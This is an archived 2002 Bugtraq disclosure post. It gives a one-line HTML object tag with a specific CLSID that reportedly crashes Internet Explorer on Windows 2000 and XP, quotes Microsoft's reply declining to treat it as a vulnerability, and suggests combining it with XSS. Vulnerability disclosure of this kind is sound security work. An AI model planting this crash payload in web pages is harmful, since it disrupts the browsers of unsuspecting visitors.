A DoS against IE in W2K and XP? You Make the Call...

From: 'ken'@FTU
Date: 06/25/02


Date: Mon, 24 Jun 2002 22:31:04 -0400
From: "'ken'@FTU" <ken_at_ftu@yahoo.com>
To: bugtraq@securityfocus.com, bugs@securitytracker.com

The following line of code will crash IE when the OS is Windows 2000 or
Windows XP.

<!-- start dosIE-doe.html -->

<object ID="dosIE-doe"
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>

<!-- end dosIE-doe.html -->

I alerted Microsoft. They replied that it is not a security
vulnerability according to their policy:

================= Begin MS reply ========================

"Suppose a flaw in a web browser could be misused by a web site to
"hang" the browser of any user who visited the site. If the user were
able to resume normal operation by stopping the browser, restarting it,
and avoiding the attacker's web site in the future, the flaw would not
constitute a security vulnerability."
(For the complete definition of a security vulnerability please see
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp)

================= End MS reply ===========================

I am aware that this code is more an inconvenience that anything else.
Although, if it were combined with another vulnerability its effect may
be much worse. (Say a XSS vulnerability also exists and an attacker
could crash the browser of every user that visits your ecommerce site...)

'ken'@FTU

-- 
"I grew convinced that truth, sincerity and integrity in dealings 
between man and man were of the utmost importance to the felicity of 
life, and I formed a written resolution to practice them ever while I 
lived."
	-Benjamin Franklin, The Autobiography of Benjamin Franklin



Relevant Pages

  • Javascript loop causes IE to crash
    ... IE contains a flaw in its JavaScript handling that makes it possible to ... crash all IE windows running in the same process. ... In terms of the definition of a security vulnerability which we discuss ...
    (Bugtraq)
  • Internet explorer 7.0 stack overflow
    ... Internet explorer is a default browser of windows ... The vulnerability is caused when you trying send some data, ...
    (Bugtraq)
  • IFRAME Buffer Overflow Vulnerability
    ... I received a notice of a new vulnerability for IE and I can't find a solution ... on Microsoft's website. ... new browser, this is for IE using Windows 2000. ...
    (microsoft.public.windows.inetexplorer.ie6.ieak)
  • SecurityFocus Microsoft Newsletter #163
    ... MICROSOFT VULNERABILITY SUMMARY ... Bugzilla Javascript Buglists Remote Information Disclosure V... ... Microsoft Internet Explorer DHTML Drag and Drop Local File S... ... Microsoft Windows Workstation Service Remote Buffer Overflow... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #176
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft Windows XP HCP URI Handler Arbitrary Command Execu... ... PHPNuke Category Parameter SQL Injection Vulnerability ... Microsoft Baseline Security Analyzer Vulnerability Identific... ...
    (Focus-Microsoft)